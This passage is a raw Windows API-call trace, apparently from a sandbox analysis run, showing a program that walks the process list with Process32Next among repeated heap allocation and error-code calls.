(dwErrCode=0x0) [0110.246] GetLastError () returned 0x0 [0110.247] SetLastError (dwErrCode=0x0) [0110.247] GetLastError () returned 0x0 [0110.247] SetLastError (dwErrCode=0x0) [0110.247] GetLastError () returned 0x0 [0110.247] SetLastError (dwErrCode=0x0) [0110.247] GetLastError () returned 0x0 [0110.247] SetLastError (dwErrCode=0x0) [0110.247] GetLastError () returned 0x0 [0110.247] SetLastError (dwErrCode=0x0) [0110.247] GetLastError () returned 0x0 [0110.247] SetLastError (dwErrCode=0x0) [0110.247] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704c0 [0110.247] GetLastError () returned 0x0 [0110.247] SetLastError (dwErrCode=0x0) [0110.247] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39704c0 | out: hHeap=0x29a0000) returned 1 [0110.247] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6838 | out: hHeap=0x29a0000) returned 1 [0110.247] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ea0 | out: hHeap=0x29a0000) returned 1 [0110.247] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6978 | out: hHeap=0x29a0000) returned 1 [0110.248] GetLastError () returned 0x0 [0110.248] SetLastError (dwErrCode=0x0) [0110.248] GetLastError () returned 0x0 [0110.248] SetLastError (dwErrCode=0x0) [0110.248] GetLastError () returned 0x0 [0110.248] SetLastError (dwErrCode=0x0) [0110.248] GetLastError () returned 0x0 [0110.248] SetLastError (dwErrCode=0x0) [0110.248] GetLastError () returned 0x0 [0110.248] SetLastError (dwErrCode=0x0) [0110.248] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0110.249] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6808 [0110.249] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970c80 [0110.249] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a69a8 [0110.250] GetLastError () returned 0x0 [0110.250] SetLastError (dwErrCode=0x0) [0110.250] GetLastError () returned 0x0 [0110.250] SetLastError (dwErrCode=0x0) [0110.250] GetLastError () returned 0x0 [0110.250] SetLastError (dwErrCode=0x0) [0110.250] GetLastError () returned 0x0 [0110.250] SetLastError (dwErrCode=0x0) [0110.250] GetLastError () returned 0x0 [0110.252] SetLastError (dwErrCode=0x0) [0110.252] GetLastError () returned 0x0 [0110.252] SetLastError (dwErrCode=0x0) [0110.252] GetLastError () returned 0x0 [0110.252] SetLastError (dwErrCode=0x0) [0110.252] GetLastError () returned 0x0 [0110.252] SetLastError (dwErrCode=0x0) [0110.252] GetLastError () returned 0x0 [0110.252] SetLastError (dwErrCode=0x0) [0110.252] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703d0 [0110.252] GetLastError () returned 0x0 [0110.252] SetLastError (dwErrCode=0x0) [0110.252] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703d0 | out: hHeap=0x29a0000) returned 1 [0110.252] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a69a8 | out: hHeap=0x29a0000) returned 1 [0110.252] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c80 | out: hHeap=0x29a0000) returned 1 [0110.252] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6808 | out: hHeap=0x29a0000) returned 1 [0110.253] GetLastError () returned 0x0 [0110.253] SetLastError (dwErrCode=0x0) [0110.253] GetLastError () returned 0x0 [0110.253] SetLastError (dwErrCode=0x0) [0110.253] GetLastError () returned 0x0 [0110.253] SetLastError (dwErrCode=0x0) [0110.253] GetLastError () returned 0x0 [0110.253] SetLastError (dwErrCode=0x0) [0110.253] GetLastError () returned 0x0 [0110.253] SetLastError (dwErrCode=0x0) [0110.253] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0110.254] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68d8 [0110.254] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970d20 [0110.254] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68b8 [0110.255] GetLastError () returned 0x0 [0110.255] SetLastError (dwErrCode=0x0) [0110.255] GetLastError () returned 0x0 [0110.255] SetLastError (dwErrCode=0x0) [0110.255] GetLastError () returned 0x0 [0110.255] SetLastError (dwErrCode=0x0) [0110.255] GetLastError () returned 0x0 [0110.255] SetLastError (dwErrCode=0x0) [0110.255] GetLastError () returned 0x0 [0110.255] SetLastError (dwErrCode=0x0) [0110.255] GetLastError () returned 0x0 [0110.255] SetLastError (dwErrCode=0x0) [0110.255] GetLastError () returned 0x0 [0110.255] SetLastError (dwErrCode=0x0) [0110.255] GetLastError () returned 0x0 [0110.255] SetLastError (dwErrCode=0x0) [0110.255] GetLastError () returned 0x0 [0110.255] SetLastError (dwErrCode=0x0) [0110.255] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970650 [0110.256] GetLastError () returned 0x0 [0110.256] SetLastError (dwErrCode=0x0) [0110.256] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970650 | out: hHeap=0x29a0000) returned 1 [0110.256] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68b8 | out: hHeap=0x29a0000) returned 1 [0110.256] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d20 | out: hHeap=0x29a0000) returned 1 [0110.256] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68d8 | out: hHeap=0x29a0000) returned 1 [0110.256] GetLastError () returned 0x0 [0110.256] SetLastError (dwErrCode=0x0) [0110.256] GetLastError () returned 0x0 [0110.256] SetLastError (dwErrCode=0x0) [0110.256] GetLastError () returned 0x0 [0110.256] SetLastError (dwErrCode=0x0) [0110.256] GetLastError () returned 0x0 [0110.256] SetLastError (dwErrCode=0x0) [0110.257] GetLastError () returned 0x0 [0110.257] SetLastError (dwErrCode=0x0) [0110.257] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.258] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6928 [0110.258] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970ec0 [0110.258] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6808 [0110.258] GetLastError () returned 0x0 [0110.258] SetLastError (dwErrCode=0x0) [0110.258] GetLastError () returned 0x0 [0110.258] SetLastError (dwErrCode=0x0) [0110.258] GetLastError () returned 0x0 [0110.258] SetLastError (dwErrCode=0x0) [0110.258] GetLastError () returned 0x0 [0110.258] SetLastError (dwErrCode=0x0) [0110.258] GetLastError () returned 0x0 [0110.259] SetLastError (dwErrCode=0x0) [0110.259] GetLastError () returned 0x0 [0110.259] SetLastError (dwErrCode=0x0) [0110.259] GetLastError () returned 0x0 [0110.259] SetLastError (dwErrCode=0x0) [0110.259] GetLastError () returned 0x0 [0110.259] SetLastError (dwErrCode=0x0) [0110.259] GetLastError () returned 0x0 [0110.259] SetLastError (dwErrCode=0x0) [0110.259] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706c8 [0110.259] GetLastError () returned 0x0 [0110.259] SetLastError (dwErrCode=0x0) [0110.259] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706c8 | out: hHeap=0x29a0000) returned 1 [0110.259] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6808 | out: hHeap=0x29a0000) returned 1 [0110.259] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ec0 | out: hHeap=0x29a0000) returned 1 [0110.260] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6928 | out: hHeap=0x29a0000) returned 1 [0110.260] GetLastError () returned 0x0 [0110.260] SetLastError (dwErrCode=0x0) [0110.260] GetLastError () returned 0x0 [0110.260] SetLastError (dwErrCode=0x0) [0110.260] GetLastError () returned 0x0 [0110.260] SetLastError (dwErrCode=0x0) [0110.260] GetLastError () returned 0x0 [0110.260] SetLastError (dwErrCode=0x0) [0110.260] GetLastError () returned 0x0 [0110.260] SetLastError (dwErrCode=0x0) [0110.260] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0110.261] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6828 [0110.261] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970b60 [0110.261] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6848 [0110.261] GetLastError () returned 0x0 [0110.262] SetLastError (dwErrCode=0x0) [0110.262] GetLastError () returned 0x0 [0110.262] SetLastError (dwErrCode=0x0) [0110.262] GetLastError () returned 0x0 [0110.262] SetLastError (dwErrCode=0x0) [0110.262] GetLastError () returned 0x0 [0110.262] SetLastError (dwErrCode=0x0) [0110.262] GetLastError () returned 0x0 [0110.262] SetLastError (dwErrCode=0x0) [0110.262] GetLastError () returned 0x0 [0110.262] SetLastError (dwErrCode=0x0) [0110.262] GetLastError () returned 0x0 [0110.262] SetLastError (dwErrCode=0x0) [0110.262] GetLastError () returned 0x0 [0110.262] SetLastError (dwErrCode=0x0) [0110.262] GetLastError () returned 0x0 [0110.262] SetLastError (dwErrCode=0x0) [0110.262] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705d8 [0110.262] GetLastError () returned 0x0 [0110.262] SetLastError (dwErrCode=0x0) [0110.263] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39705d8 | out: hHeap=0x29a0000) returned 1 [0110.263] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6848 | out: hHeap=0x29a0000) returned 1 [0110.263] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970b60 | out: hHeap=0x29a0000) returned 1 [0110.263] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6828 | out: hHeap=0x29a0000) returned 1 [0110.263] GetLastError () returned 0x0 [0110.263] SetLastError (dwErrCode=0x0) [0110.263] GetLastError () returned 0x0 [0110.263] SetLastError (dwErrCode=0x0) [0110.263] GetLastError () returned 0x0 [0110.263] SetLastError (dwErrCode=0x0) [0110.263] GetLastError () returned 0x0 [0110.263] SetLastError (dwErrCode=0x0) [0110.263] GetLastError () returned 0x0 [0110.263] SetLastError (dwErrCode=0x0) [0110.263] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0110.264] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68d8 [0110.264] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970de0 [0110.264] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a69d8 [0110.265] GetLastError () returned 0x0 [0110.265] SetLastError (dwErrCode=0x0) [0110.265] GetLastError () returned 0x0 [0110.265] SetLastError (dwErrCode=0x0) [0110.265] GetLastError () returned 0x0 [0110.265] SetLastError (dwErrCode=0x0) [0110.265] GetLastError () returned 0x0 [0110.265] SetLastError (dwErrCode=0x0) [0110.265] GetLastError () returned 0x0 [0110.265] SetLastError (dwErrCode=0x0) [0110.265] GetLastError () returned 0x0 [0110.265] SetLastError (dwErrCode=0x0) [0110.265] GetLastError () returned 0x0 [0110.265] SetLastError (dwErrCode=0x0) [0110.265] GetLastError () returned 0x0 [0110.265] SetLastError (dwErrCode=0x0) [0110.265] GetLastError () returned 0x0 [0110.265] SetLastError (dwErrCode=0x0) [0110.265] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970538 [0110.266] GetLastError () returned 0x0 [0110.266] SetLastError (dwErrCode=0x0) [0110.266] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970538 | out: hHeap=0x29a0000) returned 1 [0110.266] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a69d8 | out: hHeap=0x29a0000) returned 1 [0110.266] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970de0 | out: hHeap=0x29a0000) returned 1 [0110.266] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68d8 | out: hHeap=0x29a0000) returned 1 [0110.266] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970588 [0110.266] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2d9) returned 0x29a6bd8 [0110.266] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a69e8 | out: hHeap=0x29a0000) returned 1 [0110.266] GetLastError () returned 0x0 [0110.266] SetLastError (dwErrCode=0x0) [0110.266] GetLastError () returned 0x0 [0110.266] SetLastError (dwErrCode=0x0) [0110.266] GetLastError () returned 0x0 [0110.266] SetLastError (dwErrCode=0x0) [0110.266] GetLastError () returned 0x0 [0110.266] SetLastError (dwErrCode=0x0) [0110.267] GetLastError () returned 0x0 [0110.267] SetLastError (dwErrCode=0x0) [0110.267] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970588 | out: hHeap=0x29a0000) returned 1 [0110.267] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.268] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6828 [0110.268] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970f00 [0110.268] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68a8 [0110.268] GetLastError () returned 0x0 [0110.268] SetLastError (dwErrCode=0x0) [0110.268] GetLastError () returned 0x0 [0110.268] SetLastError (dwErrCode=0x0) [0110.268] GetLastError () returned 0x0 [0110.268] SetLastError (dwErrCode=0x0) [0110.268] GetLastError () returned 0x0 [0110.268] SetLastError (dwErrCode=0x0) [0110.268] GetLastError () returned 0x0 [0110.269] SetLastError (dwErrCode=0x0) [0110.269] GetLastError () returned 0x0 [0110.269] SetLastError (dwErrCode=0x0) [0110.269] GetLastError () returned 0x0 [0110.269] SetLastError (dwErrCode=0x0) [0110.269] GetLastError () returned 0x0 [0110.269] SetLastError (dwErrCode=0x0) [0110.269] GetLastError () returned 0x0 [0110.269] SetLastError (dwErrCode=0x0) [0110.269] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0110.269] GetLastError () returned 0x0 [0110.269] SetLastError (dwErrCode=0x0) [0110.269] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970628 | out: hHeap=0x29a0000) returned 1 [0110.269] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68a8 | out: hHeap=0x29a0000) returned 1 [0110.269] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f00 | out: hHeap=0x29a0000) returned 1 [0110.269] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6828 | out: hHeap=0x29a0000) returned 1 [0110.269] GetLastError () returned 0x0 [0110.269] SetLastError (dwErrCode=0x0) [0110.270] GetLastError () returned 0x0 [0110.270] SetLastError (dwErrCode=0x0) [0110.270] GetLastError () returned 0x0 [0110.270] SetLastError (dwErrCode=0x0) [0110.270] GetLastError () returned 0x0 [0110.270] SetLastError (dwErrCode=0x0) [0110.270] GetLastError () returned 0x0 [0110.270] SetLastError (dwErrCode=0x0) [0110.270] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0110.271] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6828 [0110.271] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970be0 [0110.271] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6898 [0110.271] GetLastError () returned 0x0 [0110.271] SetLastError (dwErrCode=0x0) [0110.271] GetLastError () returned 0x0 [0110.271] SetLastError (dwErrCode=0x0) [0110.271] GetLastError () returned 0x0 [0110.272] SetLastError (dwErrCode=0x0) [0110.272] GetLastError () returned 0x0 [0110.272] SetLastError (dwErrCode=0x0) [0110.272] GetLastError () returned 0x0 [0110.272] SetLastError (dwErrCode=0x0) [0110.272] GetLastError () returned 0x0 [0110.272] SetLastError (dwErrCode=0x0) [0110.272] GetLastError () returned 0x0 [0110.272] SetLastError (dwErrCode=0x0) [0110.272] GetLastError () returned 0x0 [0110.272] SetLastError (dwErrCode=0x0) [0110.272] GetLastError () returned 0x0 [0110.272] SetLastError (dwErrCode=0x0) [0110.272] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706a0 [0110.272] GetLastError () returned 0x0 [0110.272] SetLastError (dwErrCode=0x0) [0110.272] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706a0 | out: hHeap=0x29a0000) returned 1 [0110.272] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6898 | out: hHeap=0x29a0000) returned 1 [0110.272] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970be0 | out: hHeap=0x29a0000) returned 1 [0110.273] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6828 | out: hHeap=0x29a0000) returned 1 [0110.273] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704c0 [0110.273] GetLastError () returned 0x0 [0110.273] SetLastError (dwErrCode=0x0) [0110.273] GetLastError () returned 0x0 [0110.273] SetLastError (dwErrCode=0x0) [0110.273] GetLastError () returned 0x0 [0110.273] SetLastError (dwErrCode=0x0) [0110.273] GetLastError () returned 0x0 [0110.273] SetLastError (dwErrCode=0x0) [0110.273] GetLastError () returned 0x0 [0110.273] SetLastError (dwErrCode=0x0) [0110.273] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39704c0 | out: hHeap=0x29a0000) returned 1 [0110.273] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0110.274] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6858 [0110.274] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970e20 [0110.274] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6878 [0110.275] GetLastError () returned 0x0 [0110.275] SetLastError (dwErrCode=0x0) [0110.275] GetLastError () returned 0x0 [0110.275] SetLastError (dwErrCode=0x0) [0110.275] GetLastError () returned 0x0 [0110.275] SetLastError (dwErrCode=0x0) [0110.275] GetLastError () returned 0x0 [0110.275] SetLastError (dwErrCode=0x0) [0110.275] GetLastError () returned 0x0 [0110.275] SetLastError (dwErrCode=0x0) [0110.275] GetLastError () returned 0x0 [0110.275] SetLastError (dwErrCode=0x0) [0110.275] GetLastError () returned 0x0 [0110.275] SetLastError (dwErrCode=0x0) [0110.275] GetLastError () returned 0x0 [0110.275] SetLastError (dwErrCode=0x0) [0110.275] GetLastError () returned 0x0 [0110.275] SetLastError (dwErrCode=0x0) [0110.275] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970420 [0110.275] GetLastError () returned 0x0 [0110.276] SetLastError (dwErrCode=0x0) [0110.276] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970420 | out: hHeap=0x29a0000) returned 1 [0110.276] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6878 | out: hHeap=0x29a0000) returned 1 [0110.276] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e20 | out: hHeap=0x29a0000) returned 1 [0110.276] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6858 | out: hHeap=0x29a0000) returned 1 [0110.276] GetLastError () returned 0x0 [0110.276] SetLastError (dwErrCode=0x0) [0110.276] GetLastError () returned 0x0 [0110.276] SetLastError (dwErrCode=0x0) [0110.276] GetLastError () returned 0x0 [0110.276] SetLastError (dwErrCode=0x0) [0110.276] GetLastError () returned 0x0 [0110.276] SetLastError (dwErrCode=0x0) [0110.276] GetLastError () returned 0x0 [0110.276] SetLastError (dwErrCode=0x0) [0110.277] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0110.277] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6918 [0110.278] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970cc0 [0110.278] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6848 [0110.278] GetLastError () returned 0x0 [0110.278] SetLastError (dwErrCode=0x0) [0110.278] GetLastError () returned 0x0 [0110.278] SetLastError (dwErrCode=0x0) [0110.278] GetLastError () returned 0x0 [0110.278] SetLastError (dwErrCode=0x0) [0110.278] GetLastError () returned 0x0 [0110.278] SetLastError (dwErrCode=0x0) [0110.278] GetLastError () returned 0x0 [0110.278] SetLastError (dwErrCode=0x0) [0110.278] GetLastError () returned 0x0 [0110.278] SetLastError (dwErrCode=0x0) [0110.279] GetLastError () returned 0x0 [0110.279] SetLastError (dwErrCode=0x0) [0110.279] GetLastError () returned 0x0 [0110.279] SetLastError (dwErrCode=0x0) [0110.279] GetLastError () returned 0x0 [0110.279] SetLastError (dwErrCode=0x0) [0110.279] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970510 [0110.279] GetLastError () returned 0x0 [0110.279] SetLastError (dwErrCode=0x0) [0110.279] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970510 | out: hHeap=0x29a0000) returned 1 [0110.279] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6848 | out: hHeap=0x29a0000) returned 1 [0110.279] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970cc0 | out: hHeap=0x29a0000) returned 1 [0110.279] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6918 | out: hHeap=0x29a0000) returned 1 [0110.279] GetLastError () returned 0x0 [0110.279] SetLastError (dwErrCode=0x0) [0110.279] GetLastError () returned 0x0 [0110.279] SetLastError (dwErrCode=0x0) [0110.280] GetLastError () returned 0x0 [0110.280] SetLastError (dwErrCode=0x0) [0110.280] GetLastError () returned 0x0 [0110.280] SetLastError (dwErrCode=0x0) [0110.280] GetLastError () returned 0x0 [0110.280] SetLastError (dwErrCode=0x0) [0110.280] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0110.281] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68f8 [0110.281] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970ca0 [0110.281] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6898 [0110.281] GetLastError () returned 0x0 [0110.281] SetLastError (dwErrCode=0x0) [0110.281] GetLastError () returned 0x0 [0110.281] SetLastError (dwErrCode=0x0) [0110.281] GetLastError () returned 0x0 [0110.281] SetLastError (dwErrCode=0x0) [0110.281] GetLastError () returned 0x0 [0110.281] SetLastError (dwErrCode=0x0) [0110.281] GetLastError () returned 0x0 [0110.281] SetLastError (dwErrCode=0x0) [0110.281] GetLastError () returned 0x0 [0110.281] SetLastError (dwErrCode=0x0) [0110.281] GetLastError () returned 0x0 [0110.282] SetLastError (dwErrCode=0x0) [0110.282] GetLastError () returned 0x0 [0110.282] SetLastError (dwErrCode=0x0) [0110.282] GetLastError () returned 0x0 [0110.282] SetLastError (dwErrCode=0x0) [0110.282] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703a8 [0110.282] GetLastError () returned 0x0 [0110.282] SetLastError (dwErrCode=0x0) [0110.282] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703a8 | out: hHeap=0x29a0000) returned 1 [0110.282] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6898 | out: hHeap=0x29a0000) returned 1 [0110.282] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ca0 | out: hHeap=0x29a0000) returned 1 [0110.282] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68f8 | out: hHeap=0x29a0000) returned 1 [0110.282] GetLastError () returned 0x0 [0110.282] SetLastError (dwErrCode=0x0) [0110.282] GetLastError () returned 0x0 [0110.282] SetLastError (dwErrCode=0x0) [0110.282] GetLastError () returned 0x0 [0110.282] SetLastError (dwErrCode=0x0) [0110.282] GetLastError () returned 0x0 [0110.282] SetLastError (dwErrCode=0x0) [0110.282] GetLastError () returned 0x0 [0110.283] SetLastError (dwErrCode=0x0) [0110.283] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0110.284] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68f8 [0110.284] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970ba0 [0110.284] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6858 [0110.284] GetLastError () returned 0x0 [0110.284] SetLastError (dwErrCode=0x0) [0110.284] GetLastError () returned 0x0 [0110.284] SetLastError (dwErrCode=0x0) [0110.284] GetLastError () returned 0x0 [0110.284] SetLastError (dwErrCode=0x0) [0110.284] GetLastError () returned 0x0 [0110.284] SetLastError (dwErrCode=0x0) [0110.284] GetLastError () returned 0x0 [0110.284] SetLastError (dwErrCode=0x0) [0110.284] GetLastError () returned 0x0 [0110.285] SetLastError (dwErrCode=0x0) [0110.285] GetLastError () returned 0x0 [0110.285] SetLastError (dwErrCode=0x0) [0110.285] GetLastError () returned 0x0 [0110.285] SetLastError (dwErrCode=0x0) [0110.285] GetLastError () returned 0x0 [0110.285] SetLastError 